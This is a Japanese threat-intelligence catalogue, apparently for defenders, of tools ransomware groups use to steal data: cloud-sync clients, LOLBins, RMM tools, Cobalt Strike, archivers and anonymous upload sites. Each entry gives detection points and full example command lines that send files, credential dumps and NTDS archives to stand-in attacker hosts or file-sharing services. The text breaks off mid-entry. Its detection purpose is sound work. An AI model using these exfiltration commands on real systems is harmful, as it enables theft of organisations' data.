カテゴリ別ツール一覧

ランサムウェアアクターが使用する持ち出しツールの大半は、正規のIT運用で使われるデュアルユースツールであり、EDR による検知を回避しやすい [1][2][3]。ReliaQuest の分析（2023年9月〜2024年7月）では、Rclone が全インシデントの57%に出現し、WinSCP と cURL がそれに続く [2][5]。Symantec の調査では、リモート管理ツール（AnyDesk, ScreenConnect, Atera）の悪用が最も急成長しているカテゴリであると報告されている [1]。Sekoia は、高度なグループほどカスタム持ち出しツールを開発する傾向があるが、公開ツールの利用がコスト・検知回避の両面で依然主流であると分析している [3]。

A. クラウド同期・ファイル転送ツール（Dual-Use / LOTL）

1. Rclone

• 種別: オープンソース クラウドストレージ管理CLI
• 使用グループ: LockBit, BlackSuit/Royal, Black Basta, BlackCat/ALPHV, Akira, Conti, Hive, BianLian, Karakurt, Daixin, Trigona, Quantum, REvil, 8BASE, INC Ransom, Cactus, AvosLocker, Medusa, Dagon Locker, DarkSide, Avaddon, RansomHub, Vice Society 他多数 [11][19]
• プロセス名: rclone.exe （リネーム例: svchost.exe, svhost.exe, rsync.exe）[2]
• 備考: Mandiant の観測では、データ窃取が確認されたインシデントの約30%で Rclone が使用されていた [4]。ReliaQuest はリネームされたバイナリが静的検知を回避した事例を報告している [2]。DFIR Report では、LockBit 事案で FTP 失敗後に MEGA.io へ切り替えた事例が記録されている [13]。
• コマンド例:

  # MEGA へのコピー [13]
  rclone.exe copy \\fileserver\shares\ mega:exfil-data --transfers 20 --checkers 10

  # 設定作成（MEGA）[2]
  rclone.exe config create remotemega mega user attacker@mail.com pass encrypted_pass

  # FTP サーバへの転送 [13]
  rclone.exe config create myftp ftp host 185.xx.xx.xx port 21 user ftpuser pass ftppass
  rclone.exe copy C:\staging\ myftp:/upload/ --bwlimit 50M

  # S3 互換ストレージへの同期 [4]
  rclone.exe sync \\DC01\SYSVOL\ s3:exfil-bucket/sysvol/ --max-age 1y --include "*.{pdf,docx,xlsx,pst}"

  # Dropbox（リネームバイナリで実行された実例）[2]
  svhost.exe copy D:\Finance\ dropbox:finance-dump --transfers 15

• 検知ポイント:
  • プロセス名に関わらず --transfers, --checkers, --bwlimit, copy, sync, config 引数の組み合わせ
  • rclone.conf の作成・読込（%APPDATA%\rclone\rclone.conf）[6]
  • mega:, s3:, ftp:, sftp:, gdrive:, dropbox: などのリモート記述
  • 通常のIT資産に存在しない rclone バイナリの出現（Sysmon EID 1, 11）

2. MEGASync / MEGAcmd / Megatools

• 種別: MEGA クラウドストレージ クライアント
• 使用グループ: Akira, Conti, BlackCat, Karakurt, LockBit, BianLian, Hive, Phobos, MountLocker, Quantum, INC Ransom, Avaddon, MONTI, DarkSide, Vice Society, FiveHands, Ghost/Cring, NightSpire, Storm-0501, Trigona [11][19]
• プロセス名: MEGAsyncSetup.exe, MEGAsync.exe, megacmd.exe, megaput.exe, megacopy.exe, megaget.exe, mega.exe
• 備考: Mandiant は MEGASync を Rclone に次ぐ主要な同期ツールとして位置付けている [4]。Trend Micro は Nefilim 事案でランサムウェア展開の前日に MegaSync が使用されたことを報告している [18]。Synacktiv は Megatools のフォレンジックアーティファクト（コマンドラインが既定ではログされない点）を詳細に文書化している [6]。
• *コマンド例:

  # MEGAcmd: ログインしてフォルダ同期 [6]
  mega-login attacker@protonmail.com P@ssw0rd123
  mega-put -c C:\staging\dump.7z /Root/exfil/
  mega-sync C:\staging\ /Root/exfil/

  # Megatools: ファイルアップロード [6]
  megaput.exe --path /Root/victim-data/ C:\temp\financial_records.7z
  megacopy.exe --local C:\staging\ --remote /Root/dump/ --upload

  # MEGASync GUI はインストール後に自動同期開始（プロセス監視のみ）[18]
  MEGAsync.exe

• 検知ポイント:
  • MEGAsync.exe の新規インストール・実行（特に管理外端末）
  • mega-login, mega-put, mega-sync, megaput, megacopy コマンドの実行
  • レジストリ: HKCU\SOFTWARE\Classes\CLSID\{CLSID}\Instance\InitPropertyBag\TargetFolderPath [10]
  • *.mega.co.nz, g.api.mega.co.nz への大量の外向き通信

3. AzCopy

• 種別: Microsoft Azure ストレージ転送CLI
• 使用グループ: BianLian, Rhysida 他（2024-2025年に急増）[14][19]
• プロセス名: azcopy.exe, azcopy_windows_amd64.exe
• 備考: Varonis Threat Labs は、AzCopy による持ち出しが被害者の EDR で検知されなかった事例を複数確認している [14][21]。正規の Azure ツールであるため HTTPS 経由で Azure インフラに直接送信され、不審なホスティングプロバイダへの通信が発生しない点が特徴 [14]。
• *コマンド例:

  # SAS トークン付きの Blob ストレージへのコピー [14]
  azcopy.exe copy "\\fileserver\HR\" "https://exfilacct.blob.core.windows.net/data?sv=2022-11-02&ss=b&srt=co&sp=rwdlacu&se=2026-12-31&sig=XXXXX" --recursive

  # ローカルディレクトリの同期 [14]
  azcopy.exe sync "C:\Users\admin\Documents\" "https://attacker.blob.core.windows.net/docs?<SAS>" --delete-destination=false

  # サービスプリンシパルでのログイン
  azcopy.exe login --tenant-id xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

  # ジョブログの消去（証拠隠滅）[14]
  rmdir /s /q %USERPROFILE%\.azcopy

• 検知ポイント:
  • *.blob.core.windows.net への想定外の通信
  • .azcopy ログディレクトリの作成・削除 [14]
  • Azure Storage SASトークン含むコマンドラインの検出
  • 通常 Azure を使用しないホストからの azcopy 実行

4. FileZilla

• 種別: FTP/SFTP クライアント（GUI/CLI）
• 使用グループ: Akira, Karakurt, AvosLocker, LockBit, Nokoyawa, Diavol, Scattered Spider, PYSA, BlackCat [11][16][19]
• プロセス名: filezilla.exe, fzsftp.exe
• 備考: Mandiant によると、FTP クライアントによる持ち出しの大多数で FileZilla または WinSCP が使用された [4]。CISA の Akira アドバイザリでは FileZilla, WinRAR, WinSCP, RClone が持ち出しツールとして列挙されている [16]。
• *コマンド例:

  # GUI 起動（攻撃者は RDP 経由で操作）[4]
  filezilla.exe

  # サイトマネージャに事前登録した接続先を使用
  filezilla.exe --site="0/attacker-sftp"

  # ポータブル版の実行（インストール不要）
  C:\Users\admin\Downloads\FileZilla_Portable\filezilla.exe

  # 子プロセスとして生成される SFTP エンジン
  fzsftp.exe (親: filezilla.exe)

• 検知ポイント:
  • filezilla.exe の新規出現（ポータブル版の実行）
  • %APPDATA%\FileZilla\recentservers.xml, sitemanager.xml の作成
  • 短時間での大量FTP/SFTPセッション（ポート 21/22）

5. WinSCP

• 種別: SFTP/SCP/FTP クライアント
• 使用グループ: Play, RansomHub, Akira, Conti, Monti, Rhysida, Vice Society, LockBit, Black Basta, BlackSuit 他多数 [5][11][19]
• プロセス名: WinSCP.exe, winscp.com（CLI版）
• 備考: ReliaQuest の分析で Rclone に次ぐ第2位の使用頻度 [2][5]。Synacktiv はレジストリハイブ NTUSER\SOFTWARE\Martin Prikryl に残る痕跡やポータブル版の一時フォルダについて詳細に文書化している [6]。
• *コマンド例:

  # スクリプトモードで SFTP アップロード [6]
  winscp.com /command "open sftp://root:toor@185.xx.xx.xx:22" "put C:\staging\*.7z /upload/" "exit"

  # スクリプトファイルからの実行
  winscp.com /script=C:\temp\exfil_script.txt /log=C:\temp\winscp.log

  # INI無効化（レジストリ設定を使わない）+ ディレクトリ同期
  winscp.com /ini=nul /command "open sftp://user:pass@host" "synchronize remote C:\data /remote/data" "exit"

  # SCP モード
  winscp.com /command "open scp://admin:P@ss@10.0.0.5" "put D:\Finance\*.xlsx /tmp/" "exit"

• 検知ポイント:
  • レジストリ: HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\ [6]
  • /command, /script, open sftp://, open scp:// を含むコマンドライン
  • ポータブル版: Temp*_WinSCP--Portable.zip フォルダの出現 [6]

6. Cyberduck

• 種別: クラウドストレージ・FTP/SFTP クライアント
• 使用グループ: Scattered Spider [11]
• プロセス名: Cyberduck.exe, duck.exe（CLI版）
• *コマンド例:

  # CLI版（duck）で S3 へアップロード
  duck.exe --upload s3://exfil-bucket/data/ C:\staging\dump.7z --username AKIAXXXXXXXXXX --password SECRET

  # SFTP 転送
  duck.exe --upload sftp://attacker@185.xx.xx.xx/upload/ C:\data\confidential.zip

  # Backblaze B2 へのコピー
  duck.exe --copy "b2://bucket-name/path/" --existing rename C:\staging\

• 検知ポイント:
  • Cyberduck.exe / duck.exe の予期しないインストール・実行
  • s3://, sftp://, b2:// を含むコマンドライン引数

7. FreeFileSync

• 種別: ファイル同期ツール
• 使用グループ: LockBit [11][19]
• プロセス名: FreeFileSync.exe, RealTimeSync.exe
• 備考: Synacktiv はインシデント対応でよく遭遇するツールの一つとして分析している [6]。
• *コマンド例:

  # バッチジョブ実行（事前に作成した設定ファイル）[6]
  FreeFileSync.exe C:\temp\exfil_job.ffs_batch

  # GUI で設定後、RealTimeSync で継続監視・自動同期
  RealTimeSync.exe C:\temp\auto_sync.ffs_real

  # SFTP 同期設定が含まれるバッチファイルの実行
  FreeFileSync.exe "C:\Users\admin\Desktop\sync_to_sftp.ffs_batch"

• 検知ポイント:
  • FreeFileSync.exe の新規出現
  • .ffs_batch, .ffs_gui, .ffs_real 設定ファイルの作成（Sysmon EID 11）

8. GoodSync

• 種別: ファイル同期・バックアップツール
• 使用グループ: 複数グループで確認 [6]
• プロセス名: GoodSync.exe, gsync.exe, GoodSync-v*.exe
• 備考: Synacktiv がインストールディレクトリとレジストリキーのフォレンジック痕跡を文書化 [6]。
• *コマンド例:

  # CLI でのジョブ実行 [6]
  gsync.exe /analyze /sync /exit "SFTPBackup"

  # ジョブ作成（左: ローカル、右: SFTPサーバ）
  gsync.exe /newjob "exfil" /left="C:\staging\" /right="sftp://user:pass@host/upload/" /sync /exit

  # サイレント同期
  GoodSync.exe /sync "JobName" /noui /exit

• 検知ポイント:
  • レジストリ: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{...} (GoodSync) [6]
  • C:\Program Files\Siber Systems\GoodSync\ 配下のファイル作成
  • /sync, /analyze, /newjob 引数の検出

9. Restic

• 種別: オープンソース バックアップツール
• 使用グループ: BlackCat/ALPHV, INC Ransom, Lynx, IMN Crew [7][11]
• プロセス名: restic.exe
• 備考: Huntress は BlackCat キャンペーンで --use-fs-snapshot 付きの Restic コマンドを観測している [7]。
• *コマンド例:

  # REST サーバへのバックアップ（BlackCat キャンペーンで観測）[7]
  restic.exe -r rest:http://185.xx.xx.xx:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup \\fileserver\shares

  # S3 互換ストレージへのバックアップ
  restic.exe -r s3:https://s3.us-east-1.amazonaws.com/exfil-bucket backup C:\Users\ --exclude="*.exe"

  # リポジトリ初期化
  restic.exe -r rest:http://C2:8000/ init --password-file ppp.txt

• 検知ポイント:
  • rest:http:// または rest:https:// を含むコマンドライン
  • --password-file, --use-fs-snapshot の引数
  • UNC パス (\\) を対象とした backup コマンド

10. Backblaze B2 CLI (b2.exe)

• 種別: クラウドストレージCLI
• 使用グループ: INC Ransom [7][11]
• プロセス名: b2.exe
• 備考: Huntress が INC Ransom インシデントで観測した具体的なコマンドラインを公開している [7]。
• *コマンド例:

  # INC Ransom で観測されたコマンド [7]
  b2.exe sync \\fileserver\data\ b2://exfil-bucket --include-regex "(?i).*\.(doc|xls|xlsx|docx|pdf|csv)$|wallet\.dat$" --exclude-regex ".*" --keep-days 1826 --allow-empty-source --skip-hash-verification --exclude-all-symlinks --threads 30

  # 認証
  b2.exe authorize-account <applicationKeyId> <applicationKey>

  # 単一ファイルアップロード
  b2.exe upload-file exfil-bucket C:\staging\dump.7z dump.7z

• 検知ポイント:
  • b2.exe + sync / upload-file + b2:// の組み合わせ
  • --include-regex でドキュメント拡張子を指定するパターン [7]

11. Dropbox CLI / Dropbox API

• 種別: クラウドストレージ
• 使用グループ: BlackCat, Scattered Spider [11]
• プロセス名: dbxcli.exe, dropbox.exe
• *コマンド例:

  # dbxcli（非公式CLI）でのアップロード
  dbxcli.exe put C:\staging\dump.7z /exfil/dump.7z
  dbxcli.exe mkdir /exfil
  dbxcli.exe put -r C:\staging\ /exfil/

  # PowerShell + Dropbox API
  $headers = @{ "Authorization" = "Bearer sl.XXXXXXXXXXXXX"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{"path":"/exfil/data.7z"}' }
  Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers $headers -InFile "C:\staging\data.7z"

• 検知ポイント:
  • dbxcli の実行、put / mkdir 引数
  • content.dropboxapi.com への POST リクエスト

12. pCloud

• 種別: クラウドストレージ
• 使用グループ: DarkSide, FiveHands [11]
• プロセス名: pCloud.exe, pCloudDrive.exe
• *コマンド例:

  # pCloud Drive のインストール後、同期フォルダにファイルをコピー
  pCloudDrive.exe
  robocopy C:\staging\ "P:\exfil\" /E /R:1 /W:0

  # API 経由（curl）
  curl.exe -X POST "https://api.pcloud.com/uploadfile?path=/exfil&auth=XXXXXXX" -F "file=@C:\staging\dump.7z"

• 検知ポイント:
  • pCloud.exe / pCloudDrive.exe の予期しない出現
  • api.pcloud.com への通信

---

B. LOLBins（Living off the Land Binaries）

13. cURL (curl.exe)

• 種別: Windows 10 1803+ 標準搭載のデータ転送ツール
• 使用グループ: Black Basta, BlackCat/ALPHV 他 [2][5]
• プロセス名: curl.exe
• 備考: ReliaQuest は cURL がネイティブ搭載のため攻撃者がツールを持ち込む必要がない点を指摘 [5]。Black Basta が temp.sh と組み合わせて使用した事例が報告されている [2]。
• *コマンド例:

  # temp.sh へのアップロード（Black Basta で観測）[2]
  curl.exe -F "file=@C:\staging\creds.7z" https://temp.sh/upload

  # transfer.sh へのアップロード [19]
  curl.exe --upload-file C:\staging\dump.tar.gz https://transfer.sh/dump.tar.gz

  # file.io へのアップロード [19]
  curl.exe -F "file=@C:\staging\data.zip" https://file.io

  # SFTP 経由
  curl.exe -T C:\staging\secrets.7z sftp://user:pass@185.xx.xx.xx/upload/

  # POST でバイナリデータ送信
  curl.exe -X POST -H "Content-Type: application/octet-stream" --data-binary @C:\staging\ntds.7z https://C2.example.com/upload

  # anonfiles（サービス閉鎖済だがクローンに注意）[19]
  curl.exe -F "file=@C:\data\dump.7z" https://api.anonfiles.com/upload

• 検知ポイント:
  • curl.exe + -T / --upload-file / -F / -X POST --data-binary @ の組み合わせ
  • 一時共有サービスドメインへの送信

14. BITSAdmin (bitsadmin.exe)

• 種別: Windows 標準搭載のファイル転送管理ツール
• 使用グループ: 複数グループ [13]
• プロセス名: bitsadmin.exe
• 備考: DFIR Report は LockBit 事案で PsExec・BITSAdmin がランサムウェア配布に使われた事例を記録しているが、アップロード機能による持ち出しへの転用も想定される [13]。
• *コマンド例:

  # アップロードジョブの作成と実行
  bitsadmin /create /upload exfiljob
  bitsadmin /addfile exfiljob https://C2.example.com/drop/data.7z C:\staging\data.7z
  bitsadmin /setpriority exfiljob HIGH
  bitsadmin /resume exfiljob
  bitsadmin /complete exfiljob

  # ワンライナーでのアップロード
  bitsadmin /transfer exfil /upload /priority high https://C2.example.com/upload C:\staging\dump.7z

• 検知ポイント:
  • bitsadmin.exe + /upload / /transfer + /upload の組み合わせ
  • BITS ジョブの作成 (Windows Event Log: Microsoft-Windows-Bits-Client/Operational)

15. FTP.exe

• 種別: Windows 標準搭載のFTPクライアント
• 使用グループ: 複数グループ [7][18]
• プロセス名: ftp.exe
• 備考: Trend Micro はランサムウェアのデータ持ち出しで FTP 経由のアップロードが一般的であると報告 [18]。Huntress は LOLBin としての ftp.exe をデータ持ち出しの検知対象として挙げている [7]。
• *コマンド例:

  # スクリプトファイル経由のアップロード
  ftp.exe -s:C:\temp\ftp_upload.txt

  # ftp_upload.txt の内容例:
  # open 185.xx.xx.xx
  # user ftpuser
  # P@ssw0rd
  # binary
  # cd /upload
  # mput *.7z
  # bye

  # インタラクティブモード（非対話型）
  ftp.exe -i -n -s:commands.txt 185.xx.xx.xx

• 検知ポイント:
  • ftp.exe + -s: (スクリプト実行) の組み合わせ
  • open, put, mput コマンドを含むスクリプトファイルの作成

16. PowerShell

• 種別: Windows 標準搭載のスクリプト環境
• 使用グループ: Vice Society, Black Basta 他多数 [3][7]
• プロセス名: powershell.exe, pwsh.exe
• 備考: Sekoia の報告では、Vice Society が PowerShell ベースの持ち出しスクリプト（"Stealing off the Land"）を使用した事例が引用されている [3]。Huntress も PowerShell による Compress-Archive + 外部送信の組み合わせを検知対象として推奨 [7]。
• *コマンド例:

  # WebClient でアップロード
  powershell.exe -c "(New-Object System.Net.WebClient).UploadFile('https://C2.example.com/upload', 'C:\staging\data.7z')"

  # Invoke-WebRequest POST
  powershell.exe -c "Invoke-WebRequest -Uri 'https://C2.example.com/exfil' -Method POST -InFile 'C:\staging\ntds.dit'"

  # Vice Society パターン: 圧縮 + アップロード [3]
  powershell.exe -c "Compress-Archive -Path '\\server\share\Finance' -DestinationPath 'C:\temp\fin.zip'; (New-Object Net.WebClient).UploadFile('https://C2/up','C:\temp\fin.zip')"

  # Base64 エンコード版
  powershell.exe -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AC...

• 検知ポイント:
  • UploadFile, Invoke-WebRequest -Method POST, Invoke-RestMethod + -InFile / -Body
  • エンコードされたコマンド (-enc, -EncodedCommand)
  • Compress-Archive の直後に外部送信が続くパターン

17. RoboCopy (robocopy.exe)

• 種別: Windows 標準搭載のファイルコピーツール（内部ステージング用）
• 使用グループ: Play ランサムウェア他 [10]
• プロセス名: robocopy.exe
• 備考: Cato Networks は Play ランサムウェアの事例で、RoboCopy や GreenCollector によるファイルコピーが SMB anomaly として検出されることを報告 [10]。
• *コマンド例:

  # ネットワーク共有からステージングディレクトリへコピー [10]
  robocopy.exe \\fileserver\Finance\ C:\ProgramData\staging\ /E /COPY:DAT /R:1 /W:1 /LOG:C:\temp\rc.log

  # 拡張子フィルタ付き
  robocopy.exe \\DC01\SYSVOL\ C:\temp\sysvol\ *.pdf *.docx *.xlsx *.pst /S /MAXAGE:365

  # 複数共有の一括コピー（バッチスクリプト化）
  robocopy.exe \\server1\HR\ C:\staging\HR\ /MIR /R:0 /W:0
  robocopy.exe \\server2\Legal\ C:\staging\Legal\ /MIR /R:0 /W:0

• 検知ポイント:
  • UNC パスからローカルへの大量コピー
  • ドキュメント系拡張子フィルタの指定

18. finger.exe

• 種別: Windows 標準搭載（小規模データ転送に悪用）
• プロセス名: finger.exe
• 備考: Huntress が LOLBin による持ち出しの一例として finger.exe を挙げている [7]。
• *コマンド例:

  # データをエンコードしてfinger プロトコルで送信
  finger.exe encoded_data@attacker-host.com

  # パイプ経由でファイル内容を送出
  type C:\secrets.txt | finger.exe @attacker-c2.com

• 検知ポイント:
  • finger.exe の実行自体（現代環境で正規利用はほぼ皆無）

---

C. リモートアクセス / RMMツール

Symantec の調査では、リモート管理ツールが持ち出しツールの中で最も急速に増加しているカテゴリであり、バックドアとしても機能するため攻撃者に好まれている [1]。

19. AnyDesk

• 種別: リモートデスクトップツール
• 使用グループ: 多数 [1][17]
• プロセス名: AnyDesk.exe
• 備考: Morphisec は AnyDesk, ScreenConnect, Atera がデータ転送とラテラルムーブメントの両方に使われていると報告 [17]。
• *コマンド例:

  # サイレントインストール
  AnyDesk.exe --install "C:\ProgramData\AnyDesk" --start-with-win --silent

  # パスワード設定（無人アクセス用）
  echo P@ssw0rd | AnyDesk.exe --set-password

  # 接続先 ID を指定してリモート接続
  AnyDesk.exe 123456789

• 検知ポイント:
  • IT部門が承認していない AnyDesk の出現
  • --install, --set-password 引数（無人アクセス設定）
  • *.net.anydesk.com への通信

20. ScreenConnect (ConnectWise Control)

• 種別: リモートアクセスツール
• 使用グループ: 多数 [1]
• プロセス名: ScreenConnect.ClientService.exe, ScreenConnect.WindowsClient.exe
• *コマンド例:

  # サイレントインストール（攻撃者がカスタムインスタンスを使用）
  ScreenConnect.ClientSetup.exe /s /v"/qn SCREENCONNECTHOST=attacker-relay.screenconnect.com"

  # インストール済みクライアントの起動
  "C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.WindowsClient.exe"

• 検知ポイント:
  • 未承認の ScreenConnect インスタンスへの接続
  • サイレントインストール引数 (/s /v"/qn")

21. Atera

• 種別: RMM (Remote Monitoring & Management) ツール
• 使用グループ: 複数グループ [1]
• プロセス名: AteraAgent.exe, AteraSetup.msi
• *コマンド例:

  # MSI によるサイレントインストール
  msiexec /i AteraSetup.msi /qn IntegratorLogin=attacker@email.com CompanyId=1

  # インストール後、エージェントが自動でC2と通信
  AteraAgent.exe

• 検知ポイント:
  • msiexec + IntegratorLogin 引数
  • *.atera.com への通信

22. Pandora RC (旧 eHorus)

• 種別: リモートアクセスツール
• 使用グループ: 複数グループ [1]
• プロセス名: ehorus_agent.exe, pandora_rc_agent.exe, PandoraFMSAgent.exe
• 備考: Symantec は Pandora RC が Web ブラウザから操作可能である点に注目し、持ち出しにも利用可能と報告 [1]。
• *コマンド例:

  # エージェントのインストール [1]
  pandora_rc_agent.exe --install --server https://attacker-pandora.example.com --group exfil

  # サイレント実行
  ehorus_agent.exe -d --server https://C2.example.com:443

• 検知ポイント:
  • ehorus_agent.exe / pandora_rc_agent.exe の予期しないインストール
  • --install, --server 引数のコマンドライン

23. Cobalt Strike (ファイル転送機能)

• 種別: C2 フレームワーク
• 使用グループ: 極めて多数 [13][15][17]
• プロセス名: ビーコンは正規プロセスに注入されるため固定名なし
• 備考: DFIR Report は LockBit 事案で Cobalt Strike ビーコンが初期アクセスから Rclone による持ち出し、最終的なランサムウェア展開まで一貫して使用されたことを記録 [13]。BleepingComputer は BlackCat が WinSCP の偽広告で Cobalt Strike を配布した事例を報告 [15]。
• *コマンド例 (Beacon 内部コマンド):

  # ファイルダウンロード（被害者→攻撃者）[13]
  beacon> download C:\Users\admin\Desktop\secrets.xlsx
  beacon> download \\fileserver\share\HR\payroll.xlsx

  # .NET アセンブリ実行によるカスタム Exfil
  beacon> execute-assembly /opt/tools/SharpExfil.exe --path \\server\share --dest https://C2/upload

  # SOCKSプロキシ経由でのデータ転送
  beacon> socks 1080

• 検知ポイント:
  • Named Pipe パターン: \\.\pipe\MSSE-*, \\.\pipe\postex_*, \\.\pipe\msagent_*
  • rundll32.exe の異常な引数・親プロセス関係

---

D. アーカイブ・ステージングツール

Mandiant の報告では、攻撃者は持ち出し前にキーワード検索（"secret", "finance", "confidential", "password" 等）でファイルを選別し、7-Zip や WinRAR で圧縮するのが一般的なパターンである [4]。

24. 7-Zip (7z.exe / 7za.exe)

• 種別: 圧縮・アーカイブツール
• 使用グループ: 極めて多数 [12][18]
• プロセス名: 7z.exe, 7za.exe, 7zG.exe
• 備考: Microsoft は Cuba ランサムウェア事案で C:\Windows\Temp\7z.exe から実行され、ホスト名をアーカイブ名にしたパターンを報告 [12]。Huntress はポータブル版の 7zG.exe 使用例を公開 [7]。
• *コマンド例:

  # パスワード付き圧縮（Cuba ランサムウェア観測）[12]
  C:\Windows\Temp\7z.exe a -pInfect3d C:\Windows\Temp\DC01.7z \\DC01\C$\

  # ポータブル版での圧縮（Huntress 観測）[7]
  C:\Users\user\Downloads\7-ZipPortable\App\7-Zip64\7zG.exe a -i#7zMap19592:2148:7zEvent5339 -ad -saa -- "\\fileserver\Data\Data"

  # 高速圧縮（最小圧縮率で速度重視）
  7za.exe a -tzip -mx=1 C:\staging\finance.zip \\server\Finance\*.xlsx \\server\Finance\*.pdf

• 検知ポイント:
  • a (add) + -p (パスワード) + UNC パス
  • C:\Windows\Temp\ での実行 [12]
  • ホスト名をアーカイブ名に使用するパターン [12]

25. WinRAR (rar.exe / WinRAR.exe)

• 種別: 圧縮・アーカイブツール
• 使用グループ: Akira 他多数 [7][16]
• プロセス名: WinRAR.exe, rar.exe
• 備考: CISA の Akira アドバイザリで WinRAR が持ち出しツールとして列挙 [16]。Huntress はステージング用の WinRAR コマンドラインを公開 [7]。
• *コマンド例:

  # Huntress 観測: 大量フォルダを指定した圧縮 [7]
  "C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -imon1 -- . D:\Accounting D:\HR D:\Legal

  # パスワード付き暗号化（ヘッダも暗号化）
  rar.exe a -hp"Str0ngP@ss!" -r C:\staging\exfil.rar \\fileserver\shares\

  # 指定拡張子のみ
  rar.exe a -r C:\staging\docs.rar \\server\data\ -n*.pdf -n*.docx -n*.xlsx -n*.pst

• 検知ポイント:
  • a (add) + -hp (暗号化) + 大量のソースパス指定
  • -n* による拡張子フィルタリング

---

E. SCP / SSH ベース転送

26. PuTTY Secure Copy (pscp.exe)

• 種別: SCP/SFTP クライアント
• 使用グループ: AvosLocker, MONTI, RansomHub, BlackCat/ALPHV, Cuba, Prophet Spider [11][12][19]
• プロセス名: pscp.exe （リネーム例: lsas.exe）
• 備考: Microsoft は Cuba ランサムウェア事案で PSCP が lsas.exe にリネームされ、C:\Windows\Temp から実行されたことを報告 [12]。BleepingComputer は BlackCat が PuTTY Secure Copy client を持ち出しに使用した事例を記録 [15]。
• *コマンド例:

  # lsas.exe にリネームした SCP アップロード（Microsoft 観測）[12]
  C:\Windows\Temp\lsas.exe -r -P 22 \\fileserver\Staff\ root@185.xx.xx.xx:/upload/staff/
  C:\Windows\Temp\lsas.exe -r -P 22 \\fileserver\Finance\ root@185.xx.xx.xx:/upload/finance/

  # 通常のプロセス名での実行 [15]
  pscp.exe -sftp -batch -pw P@ssw0rd C:\staging\*.7z admin@C2.example.com:/exfil/

• 検知ポイント:
  • C:\Windows\Temp\ からの実行 [12]
  • プロセス名の偽装（lsas.exe → lsass.exe 類似）[12]

27. SCP (OpenSSH)

• 種別: Windows OpenSSH 標準搭載
• 使用グループ: 複数
• プロセス名: scp.exe
• *コマンド例:

  # ディレクトリ再帰コピー
  scp.exe -r C:\staging\dump\ attacker@185.xx.xx.xx:/upload/

  # ポート指定 + 鍵認証
  scp.exe -P 2222 -i C:\temp\key.pem C:\staging\data.7z user@host:/exfil/

  # ネットワーク共有からの直接転送
  scp.exe -r "\\fileserver\Finance\FY2025\" root@C2:/data/

• 検知ポイント:
  • scp.exe + @ + 外部 IP/ホスト名を含むコマンドライン

---

F. Web ベース一時ファイル共有サービス

28. GoFile.io

• 種別: 匿名ファイルアップロードサービス
• 使用グループ: AvosLocker 他 [7][11]
• 備考: Huntress は 7z によるステージング後に GoFile.io が使用された事例を報告 [7]。
• *コマンド例:

  # curl 経由（Huntress 観測: 7z 後に GoFile 使用）[7]
  curl.exe -F "file=@C:\staging\data.7z" https://store1.gofile.io/uploadFile

• 検知ポイント: gofile.io, store*.gofile.io への POST 通信

29. temp.sh

• 種別: 一時ファイル共有サービス
• 使用グループ: Akira, BlackSuit, LockBit3, Black Basta [2][19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\creds.7z" https://temp.sh/upload  # [2]

• 検知ポイント: temp.sh ドメインへの通信

30. transfer.sh

• 種別: 一時ファイル共有サービス
• 使用グループ: LockBit3 [19]
• *コマンド例:

  curl.exe --upload-file C:\staging\ntds.7z https://transfer.sh/ntds.7z

• 検知ポイント: transfer.sh ドメインへの通信

31. file.io

• 種別: 一時ファイル共有サービス
• 使用グループ: Babuk, Mallox, LockBit3 [11][19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\data.zip" https://file.io

• 検知ポイント: file.io ドメインへの POST 通信

32. Qaz.im

• 種別: ファイル共有サービス
• 使用グループ: Conti, Black Basta [11][19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\exfil.rar" https://qaz.im/upload

• 検知ポイント: qaz.im ドメインへの通信（希少なのでアクセス自体をアラート）

33. EasyUpload.io

• 種別: ファイルアップロードサービス
• 使用グループ: Qilin [11][19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\data.7z" https://easyupload.io/api/upload

• 検知ポイント: easyupload.io ドメインへの通信

34. PrivatLab

• 種別: ファイル共有サービス
• 使用グループ: Hive, REvil, BlackMatter, MountLocker [11][19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\dump.rar" https://privatlab.com/upload

• 検知ポイント: privatlab.com / privatlab.net への通信

35. Dropfiles

• 種別: ファイル共有サービス
• 使用グループ: Conti [11][19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\data.7z" https://dropfiles.com/upload

• 検知ポイント: dropfiles.com への通信

36. Dropmefiles

• 種別: ファイル共有サービス
• 使用グループ: Mallox [11][19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\data.7z" https://dropmefiles.com/upload

• 検知ポイント: dropmefiles.com への通信

37. Sendspace

• 種別: ファイル共有サービス
• 使用グループ: Conti, Hive, Avaddon, DarkSide, Mallox, REvil [19]
• *コマンド例:

  # API 経由
  curl.exe -F "file=@C:\staging\dump.rar" "https://api.sendspace.com/rest/?method=upload.getinfo&api_key=XXXX"

  # PowerShell 経由
  Invoke-WebRequest -Uri "https://www.sendspace.com/upload" -Method POST -InFile "C:\staging\data.7z"

• 検知ポイント: sendspace.com, api.sendspace.com への通信

38. Anonfiles

• 種別: 匿名ファイルアップロード（本家閉鎖済、クローン多数）
• 使用グループ: Avaddon, LockBit3 [19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\data.7z" https://api.anonfiles.com/upload
  curl.exe -F "file=@C:\staging\data.7z" https://anonfiles.la/upload  # クローンサイト例

• 検知ポイント: anonfiles.com, anonfiles.la, anonfiles.* への通信

39. UFile (ufile.io)

• 種別: ファイルアップロードサービス
• 使用グループ: Hive [19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\exfil.7z" https://ufile.io/api/upload

• 検知ポイント: ufile.io への通信

40. Bashupload

• 種別: ファイルアップロードサービス
• 使用グループ: DarkSide [19]
• *コマンド例:

  curl.exe https://bashupload.com -T C:\staging\data.7z
  curl.exe --upload-file C:\staging\dump.tar.gz https://bashupload.com/dump.tar.gz

• 検知ポイント: bashupload.com への通信

41. Tempsend

• 種別: セキュアファイル転送サービス
